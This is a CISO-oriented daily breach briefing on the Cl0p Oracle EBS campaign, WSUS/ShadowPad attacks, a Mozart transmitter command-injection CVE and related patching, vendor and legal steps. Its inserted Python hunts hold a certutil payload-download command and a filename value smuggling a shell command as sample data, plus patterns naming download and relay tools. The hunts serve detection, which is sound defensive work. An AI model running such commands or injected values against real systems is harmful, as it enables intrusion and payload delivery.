CISOPlatform • Daily Breach Intelligence
Daily Breach Intelligence – 26 November 2025
High-signal incidents, CVEs to watch, detections to run, and a D0/D3 action plan.
Shared via CISO Platform. Use the live tool (daily reports at your convenience)
Focus period: Last 24 hours • Audience: CISOs & Security Leadership
Overall severity: Critical • High-signal only • CISO-first view
Headlines [Critical]
- Oracle E‑Business Suite (EBS) campaign widens – Ivy League & global brands exposed
  Dartmouth College has confirmed that its Oracle EBS instance was compromised in the Cl0p campaign; attackers exfiltrated archives totalling ~226 GB of data, including personal and financial information (SSNs, etc.). Canon and Mazda have also confirmed being targeted, and Cl0p’s Oracle EBS leak site now lists 100+ alleged victims across sectors. (source)
- Cl0p’s Oracle‑driven data theft: Logitech & others still in the blast radius
  New coverage reiterates that Logitech’s earlier‑confirmed breach is part of the same Oracle EBS zero‑day campaign (CVE‑2025‑61882), with Cl0p claiming theft of up to 1.8 TB of internal data spanning employees, customers and suppliers. (source)
- New critical CVE with unauthenticated RCE in broadcast infrastructure (CVE‑2025‑66253)
  CVE‑2025‑66253, published in the last hours, is a 9.9‑rated unauthenticated OS command‑injection bug in DB Elettronica Telecomunicazioni’s Mozart FM Transmitter line; user input passed directly into exec() allows remote code execution on devices exposed via start_upgrade.php. (source)
- WSUS critical flaw actively abused to deploy ShadowPad (CVE‑2025‑59287)
  Microsoft’s WSUS deserialization bug (CVSS 9.8) is now confirmed as under active exploitation; AhnLab reports attackers using it for initial access, then PowerCat plus certutil/curl to deploy ShadowPad malware with SYSTEM privileges on Windows servers. (source)
- Oklahoma’s amended breach‑notification law: countdown to Jan 1, 2026
  Oklahoma’s SB 626 substantially expands its Security Breach Notification Act (broader definition of PI, new AG‑notification triggers, more prescriptive content requirements) with an effective date of 1 Jan 2026, increasing multi‑state complexity for any US breach touching Oklahoma residents. (source)
What’s New
- Oracle EBS mega‑campaign – higher‑ed, manufacturing, media, finance
  - Dartmouth confirms Oracle EBS compromise in the August zero‑day window; Maine AG filings reference SSNs and other financial data; the total number of impacted individuals is still unknown. (SecurityWeek)
  - Cl0p’s leak site lists over 100 alleged Oracle victims; in a 24‑hour window around 20–21 Nov, at least 29 additional companies were reportedly breached, including Oracle itself, Michelin, Broadcom, Humana, Canon, Mazda, and multiple industrials and retailers. (Z2Data)
  - This remains an ongoing data‑extortion wave rather than a closed incident; new victims are still being named and dumps expanded.
- Financial & healthcare notifications – third‑party exposure theme
  - BOK Financial has notified US state regulators that a vendor (Linedata) incident exposed customer names and SSNs; breach letters began going out 21 Nov. (Strauss Borrelli PLLC)
  - Synergy Advanced Healthcare in Connecticut reported a PHI breach to HHS OCR, likely impacting >1,200 individuals; notifications are expected to follow. (Strauss Borrelli PLLC)
- Open‑source and browser stack still under stress
  - The Fluent Bit logging agent (deployed “billions” of times across major clouds) faces multiple new CVEs, including the CVE‑2025‑12972 path traversal, with researchers warning that years‑old bugs left cloud environments exposed and highlighting patch‑coordination challenges. (The Register)
  - Google’s Chrome zero‑day in V8 (CVE‑2025‑13223) remains an active concern; exploitation in the wild led to emergency updates to 142.0.7444.175/.176 across platforms. (TechRadar)
- Regulatory signalling: state AGs drive privacy enforcement
  - Reuters’ 2025 enforcement review emphasizes US state AGs and dedicated privacy agencies (e.g., California CPPA) as the “leading edge” of privacy law, with coordinated actions, MOUs across states, and record settlements (e.g., Google geolocation, healthline.com). (Reuters)
  - California AG’s recent $1.4M settlement with Jam City, Inc. for alleged CCPA and UCL violations around children’s data and in‑app monetisation underscores continued focus on mobile and gaming ecosystems. (Holland & Knight)
Exploits & CVEs Watchlist [Critical]
- CVE‑2025‑66253 – DB Elettronica Mozart FM Transmitter – unauthenticated RCE (NEW, 9.9) (source)
- CVE‑2025‑61882 / CVE‑2025‑61884 – Oracle E‑Business Suite zero‑day cluster (ongoing) (source, source)
- CVE‑2025‑59287 – Windows Server WSUS RCE (Critical, exploited) (source)
- CVE‑2025‑58034 – Fortinet FortiWeb WAF OS command injection (KEV) (source)
- CVE‑2025‑13223 – Chrome V8 type‑confusion RCE (zero‑day) (source)
- CVE‑2025‑12972 & related Fluent Bit CVEs – telemetry agent exposures (source)
- CVE‑2025‑62215 – Windows Kernel EoP (zero‑day) (source)
Detections To Run Today [Action Required]
1. Oracle EBS / Cl0p campaign hunts
   - Search Oracle EBS application logs and web server logs for:
     - Unknown or recently modified JSP/PHP/PLSQL files in EBS web roots (especially BI Publisher & Concurrent Manager directories).
     - Outbound connections from EBS hosts to unfamiliar IPs / ASNs, especially during the 9–12 Aug and 20–21 Nov windows or matching current Cl0p IOC lists. (Z2Data)
   - Look for large archive creation and exfil events (ZIP/TAR/7z) originating from EBS service accounts to external endpoints or S3/Blob storage outside your org.
2. WSUS exploitation & ShadowPad
   - On Windows servers running WSUS:
     - Detect w3wp.exe or other WSUS‑associated processes spawning cmd.exe or powershell.exe that in turn execute PowerCat, certutil, curl, or bitsadmin. (TechRadar)
     - Correlate with anomalous DLL side‑loading involving ETDCtrlHelper.exe or unexpected services referencing ShadowPad‑related modules.
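A process-lineage hunt for the WSUS pattern above, as an added example that is not part of the original briefing or AhnLab's reporting: it walks constructed Sysmon-style process-creation events, flags cmd.exe/powershell.exe whose ancestry includes the WSUS IIS worker (w3wp.exe) or WsusService.exe, and raises severity when the command line invokes PowerCat, certutil, curl or bitsadmin. The process names in WSUS_PARENTS and the sample events are assumptions.

```python
import re

# Constructed process-creation events in a Sysmon Event ID 1 style; not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 900,  "ppid": 1,    "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k iissvcs"},
    {"pid": 4100, "ppid": 900,  "image": r"C:\Windows\System32\inetsrv\w3wp.exe", "cmdline": "w3wp.exe -ap WsusPool"},
    {"pid": 4120, "ppid": 4100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c certutil -urlcache -f http://203.0.113.10/update.bin update.bin"},
    {"pid": 4130, "ppid": 4100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c Get-Date"},
    {"pid": 5000, "ppid": 1,    "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 5010, "ppid": 5000, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c curl https://example.org"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
WSUS_PARENTS = {"w3wp.exe", "wsusservice.exe"}   # IIS worker (WsusPool) and the WSUS service; assumed names
TOOL_RE = re.compile(r"\b(powercat|certutil|curl|bitsadmin)\b", re.IGNORECASE)

def basename(image):
    return image.rsplit("\\", 1)[-1].lower()

def ancestors(events, pid):
    """Parent chain for pid, nearest first; stops at unknown parents and guards against cycles."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen, cur = [], set(), by_pid.get(pid)
    while cur and cur["ppid"] in by_pid and cur["ppid"] not in seen:
        seen.add(cur["ppid"])
        cur = by_pid[cur["ppid"]]
        chain.append(cur)
    return chain

def hunt_wsus_shells(events):
    """Flag shells whose ancestry includes a WSUS process; 'high' if a download/relay tool is on the command line."""
    findings = []
    for e in events:
        if basename(e["image"]) not in SHELLS:
            continue
        parents = [basename(a["image"]) for a in ancestors(events, e["pid"])]
        if not WSUS_PARENTS.intersection(parents):
            continue
        tool = TOOL_RE.search(e["cmdline"])
        findings.append({
            "pid": e["pid"],
            "parent_chain": parents,
            "tool": tool.group(1).lower() if tool else None,
            "severity": "high" if tool else "medium",
        })
    return findings
```

The explorer.exe-spawned curl is deliberately left unflagged: the signal is the WSUS ancestry, not the tool name alone.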
3. Broadcast / OT perimeter (CVE‑2025‑66253)
   - Enumerate and profile any DB Elettronica Mozart transmitters or similar RF infrastructure reachable via IP.
   - Look for HTTP requests to /var/tdf/start_upgrade.php or similar upgrade endpoints with unusual filename parameters or shell metacharacters. (Cuberk)
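An access-log check for the upgrade-endpoint pattern above, as an added example that is not from the original briefing or the Cuberk advisory: it parses constructed combined-format web-server lines, keeps only requests to start_upgrade.php or other upgrade handlers, and flags filename parameters containing shell metacharacters or other unexpected characters. The log format and the SAFE_NAME pattern are assumptions about the transmitter's web server.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined-log-format request line: client, timestamp, method, target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
SHELL_META = set(';|&`$<>(){}\n\r')          # characters that never belong in a firmware filename
SAFE_NAME = re.compile(r'^[A-Za-z0-9._-]+$')  # expected shape of a legitimate filename value (assumption)

# Constructed access-log lines using RFC 5737 test addresses; not real transmitter traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Nov/2025:08:01:10 +0000] "GET /var/tdf/start_upgrade.php?filename=mozart_fw_2.3.bin HTTP/1.1" 200 512
198.51.100.9 - - [26/Nov/2025:08:02:41 +0000] "GET /var/tdf/start_upgrade.php?filename=fw.bin%3Bid HTTP/1.1" 200 88
203.0.113.5 - - [26/Nov/2025:08:03:00 +0000] "GET /index.php HTTP/1.1" 200 1024
"""

def is_upgrade_endpoint(path):
    p = path.lower()
    return p.endswith("/start_upgrade.php") or "upgrade" in p

def inspect_params(query):
    """Return reasons a query string looks like injection rather than a normal upgrade request."""
    reasons = []
    for key, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:                       # parse_qs has already percent-decoded the value
            if set(value) & SHELL_META:
                reasons.append(f"shell metacharacter in {key}={value!r}")
            elif key == "filename" and not SAFE_NAME.match(value):
                reasons.append(f"unexpected filename value {value!r}")
    return reasons

def hunt_upgrade_requests(log_text):
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, method, target, status = m.groups()
        url = urlsplit(target)
        if not is_upgrade_endpoint(url.path):
            continue
        reasons = inspect_params(url.query)
        findings.append({"ip": ip, "time": ts, "method": method, "path": url.path,
                         "status": int(status), "suspicious": bool(reasons), "reasons": reasons})
    return findings
```

POST bodies are not recorded in access logs, so the same parameter check has to run on WAF or packet-capture data for upgrades submitted by POST.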
4. Browser & endpoint exposure
   - From EDR / inventory, pull a current list of endpoints with:
     - Chrome/Edge builds older than 142.0.7444.175/.176 (CVE‑2025‑13223).
     - Windows builds missing the November cumulative update that fixes CVE‑2025‑62215.
   - Flag those endpoints for priority patching and extra monitoring (scripted exploitation patterns, abnormal browser child processes).
5. Fluent Bit & cloud telemetry
   - In Kubernetes and cloud environments:
     - Discover all Fluent Bit instances and versions; flag anything older than 4.1.1. (The Register)
     - Review for abnormal plugin configurations, non‑standard Path/Tag values, and connections to unapproved destinations.
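A configuration audit for the Fluent Bit checks above, as an added example that is not from the original briefing or the Fluent Bit project: it flags versions below 4.1.1 and parses a constructed classic-format config to report non-standard Path and Tag values and outputs to unapproved plugins or hosts. The allowlists (APPROVED_OUTPUTS, APPROVED_HOSTS, STANDARD_PATHS) are assumptions standing in for your own baseline.

```python
import re

MIN_VERSION = (4, 1, 1)                                      # briefing floor: flag anything below 4.1.1
APPROVED_OUTPUTS = {"forward", "es", "opensearch"}           # assumed org-standard output plugins
APPROVED_HOSTS = {"logs.internal.example", "203.0.113.50"}  # constructed destination allowlist
STANDARD_PATHS = ("/var/log/",)                              # where inputs are expected to read from
SAFE_TAG = re.compile(r"^[A-Za-z0-9_.*-]+$")                 # dotted words only: no slashes or '..'

# Constructed classic-format config: one compliant input, one deviant input, one unapproved output.
SAMPLE_CONFIG = """\
[INPUT]
    Name  tail
    Path  /var/log/containers/*.log
    Tag   kube.*
[INPUT]
    Name  tail
    Path  /tmp/*.log
    Tag   ../escape
[OUTPUT]
    Name  http
    Match *
    Host  198.51.100.77
"""

def parse_classic(text):
    sections = []  # [(SECTION, {key: value}), ...]; comments stripped, keys lower-cased
    for line in (l.split("#", 1)[0].strip() for l in text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            sections.append((line[1:-1].upper(), {}))
        elif line and sections:
            key, _, value = line.partition(" ")
            sections[-1][1][key.lower()] = value.strip()
    return sections

def audit_fluent_bit(version, config_text):
    findings = []  # one human-readable deviation per entry
    if tuple(int(x) for x in version.split(".")[:3]) < MIN_VERSION:
        findings.append(f"version {version} below 4.1.1")
    for section, kv in parse_classic(config_text):
        if section == "INPUT":
            if kv.get("path") and not kv["path"].startswith(STANDARD_PATHS):
                findings.append(f"non-standard Path {kv['path']}")
            if kv.get("tag") and not SAFE_TAG.match(kv["tag"]):
                findings.append(f"non-standard Tag {kv['tag']!r}")
        elif section == "OUTPUT":
            if kv.get("name") not in APPROVED_OUTPUTS:
                findings.append(f"unapproved output plugin {kv.get('name')}")
            if kv.get("host") and kv["host"] not in APPROVED_HOSTS:
                findings.append(f"unapproved destination {kv['host']}")
    return findings
```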
Control Checks [Recommended]
- Oracle EBS controls
  - Confirm all EBS instances (including those at MSPs / outsourced shared services) are patched for CVE‑2025‑61882 and related vulnerabilities per Oracle’s security alerts. (Z2Data)
  - Enforce strict network segmentation and dedicated outbound gateways for EBS; restrict administrative access to jump‑hosts with MFA and session recording.
- WSUS hardening
  - Apply out‑of‑band updates addressing CVE‑2025‑59287 across WSUS servers; validate successful deployment rather than assuming compliance. (TechRadar)
  - Restrict who can publish updates to WSUS and require code‑signing verification; ensure WSUS traffic is TLS‑protected and limited to expected subnets.
- FortiWeb & WAF posture
  - Patch FortiWeb to fixed versions for CVE‑2025‑58034; where patching lags, geofence access and enforce strong admin auth (MFA + IP allowlisting). (TechRadar)
  - Add virtual patching rules to detect/deny suspicious OS‑shell patterns in HTTP/CLI inputs.
- Browser & endpoint baselines
  - Make Chrome/Edge 142.0.7444.175+ the minimum allowed version in your baseline; block older releases via endpoint management. (TechRadar)
  - Confirm November Windows cumulative updates (including the CVE‑2025‑62215 patch) are deployed to all internet‑facing and privileged endpoints. (The Hacker News)
- Fluent Bit / telemetry stack
  - Standardize a hardened deployment pattern for Fluent Bit (fixed tags/paths, read‑only configs where possible, minimal plugins) and push it across all clusters. (The Register)
Third-Party & SaaS Risks [Action Required]
- Oracle EBS – hosted & vendor‑managed footprints
  - Identify all service providers (BPO, shared‑services, cloud integrators, MSSPs) operating Oracle EBS on your behalf and request:
    - Patch status for CVE‑2025‑61882/61884 and related EBS fixes.
    - Confirmation of web shell hunting, exfiltration checks and credential rotation. (Z2Data)
- Financial vendors (BOK/Linedata case study)
  - Review your contracts and current due‑diligence for vendors holding SSNs or account data.
  - Ask for detail on: incident identification timelines, regulator notifications (e.g., Maine AG notices), and data‑minimisation practices. (Strauss Borrelli PLLC)
- Healthcare PHI processors (Synergy example)
  - Confirm that PHI‑handling vendors are under BAA‑equivalent agreements and have explicit breach‑notification SLAs aligned with HHS OCR requirements. (Strauss Borrelli PLLC)
- Consumer apps & kids’ data (Jam City, broader AG focus)
  - Inventory third‑party SDKs and advertising / analytics partners inside your mobile apps and web properties, especially where children or teens are a material user segment.
  - Check that opt‑outs, consent flows and data‑sharing align with CCPA/CPRA, state kids’ design laws and AG expectations, given recent settlements and broader 2025 enforcement trends. (Holland & Knight)
- Multi‑state breach law posture (Oklahoma & beyond)
  - Update your legal response playbook to reflect Oklahoma’s amended statute (AG notice, new content requirements) ahead of 1 Jan 2026, and map overlaps with California, Colorado, Texas and others. (Troutman Privacy)
Communication Note
- Board / ExCo
  - Short note tying together:
    - Oracle EBS campaign impact (sector‑wide; Dartmouth, Canon, Logitech etc.). (Red Hot Cyber)
    - New high‑impact CVEs (CVE‑2025‑66253, CVE‑2025‑59287, FortiWeb, Chrome). (TechRadar)
    - Your organisation’s exposure statement (“we do / do not run Oracle EBS; X% of WSUS/Chrome/FortiWeb fleet already patched”).
- Regulators / DPO / Legal
  - Brief summarising:
    - Oklahoma’s upcoming breach‑notification changes (SB 626) and how your templates & workflows will be updated. (Troutman Privacy)
    - Ongoing enforcement themes from state AGs and privacy agencies (children’s privacy, data brokers, AI, opt‑outs). (Reuters)
- IT & Security Ops teams
  - Targeted bulletin focusing on:
    - Required hunts for Oracle EBS, WSUS, Mozart transmitters, Fluent Bit and browsers (see “Detections To Run Today”).
    - Crystal‑clear patch deadlines and owner assignments.
- Business / customer‑facing teams
  - Talking points clarifying:
    - Whether you or key vendors are affected by the Oracle/Cl0p campaign.
    - Any planned notifications, credit‑monitoring offers, or service changes if you are in scope.
Action Plan
Today (D0–D1)
1. Triage Oracle EBS exposure – confirm whether you or any critical vendors run Oracle EBS; if yes, validate patch status and run a compromise assessment (web shells, large data exports, unusual outbound traffic). (Z2Data)
2. Patch & isolate the “big four” technical risks:
   - WSUS (CVE‑2025‑59287)
   - FortiWeb (CVE‑2025‑58034)
   - Chrome/Edge (CVE‑2025‑13223)
   - Fluent Bit (CVE‑2025‑12972 cluster) (TechRadar)
3. Kick off hunts for: WSUS exploitation, ShadowPad, Oracle EBS exfiltration, Mozart FM exploitation and suspicious upgrade requests, and any signs of Cl0p‑style exfil staging.
Next 2–3 days (D2–D3)
4. Third‑party review sprint focused on: Oracle EBS operators, core financial and PHI processors, high‑risk mobile/consumer apps.
5. Update IR & notification playbooks to reflect Oklahoma SB 626 and cross‑state coordination patterns highlighted in this year’s privacy enforcement review. (Troutman Privacy)
Next 7–10 days (D7–D10)
6. Governance uplift: incorporate 2025 enforcement themes (kids’ privacy, data brokers, AI training data, opt‑outs) into your data‑governance roadmap and board‑level risk register. (Reuters)
7. Technical hardening: finalise standard hardening baselines for WAFs, telemetry agents (Fluent Bit), WSUS / update infrastructure and browser versioning; integrate them into CI/CD and infrastructure‑as‑code.
